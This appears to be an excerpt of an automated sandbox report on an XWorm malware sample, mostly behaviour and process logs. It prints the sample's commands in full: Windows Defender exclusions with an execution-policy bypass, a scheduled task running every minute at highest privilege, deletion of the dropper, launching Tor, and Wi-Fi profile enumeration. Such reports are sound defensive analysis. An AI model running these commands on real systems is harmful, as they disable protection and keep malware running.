Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Memory allocated: page read and write | page guard

Adds a directory exclusion to Windows Defender

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "ffmaba" /sc minute /tr "c:\users\user\appdata\local\starlabs\ffmaba.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\ffmaba.exe" &&start "" "c:\users\user\appdata\local\starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "ffmaba" /sc minute /tr "c:\users\user\appdata\local\starlabs\ffmaba.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\ffmaba.exe" &&start "" "c:\users\user\appdata\local\starlabs\ffmaba.exe"

Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-cq
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\cq@\cq'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $cq'PING!<Xwormmm>Program Manager<Xwormmm>0Tecq
Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $cq'PING!<Xwormmm>Program Manager<Xwormmm>0TecqxF

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Users\user\Desktop\yt7dW9nyJK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Users\user\Desktop\yt7dW9nyJK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
